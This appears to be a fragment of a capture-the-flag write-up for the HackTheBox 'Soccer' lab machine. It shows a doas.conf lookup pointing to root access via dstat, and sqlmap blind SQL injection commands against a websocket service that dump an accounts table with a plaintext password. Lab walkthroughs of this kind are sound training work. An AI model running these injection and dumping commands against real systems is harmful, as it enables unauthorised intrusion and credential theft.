Player
Last updated
Was this helpful?
Last updated
Was this helpful?
www-data@soccer:/home/player$ cat /usr/local/etc/doas.conf
cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
adot@kali:~/oscp/htb/soccer$ sqlmap -u 'ws://soc-player.soccer.htb:9091' --data '{"id":"*"}' --technique=B --risk 3 --level 5
___
__H__
___ ___[,]_____ ___ ___ {1.8.3#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:48:30 /2024-05-24/
adot@kali:~/oscp/htb/soccer$ sqlmap -u 'ws://soc-player.soccer.htb:9091' --data '{"id":"*"}' --technique=B --risk 3 --level 5 --dbs
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:50:14 /2024-05-24/
adot@kali:~/oscp/htb/soccer$ sqlmap -u 'ws://soc-player.soccer.htb:9091' --data '{"id":"*"}' --technique=B --risk 3 --level 5 -D soccer_db --dump --threads 10
___
__H__
___ ___[.]_____ ___ ___ {1.8.3#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:07:06 /2024-05-24/
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+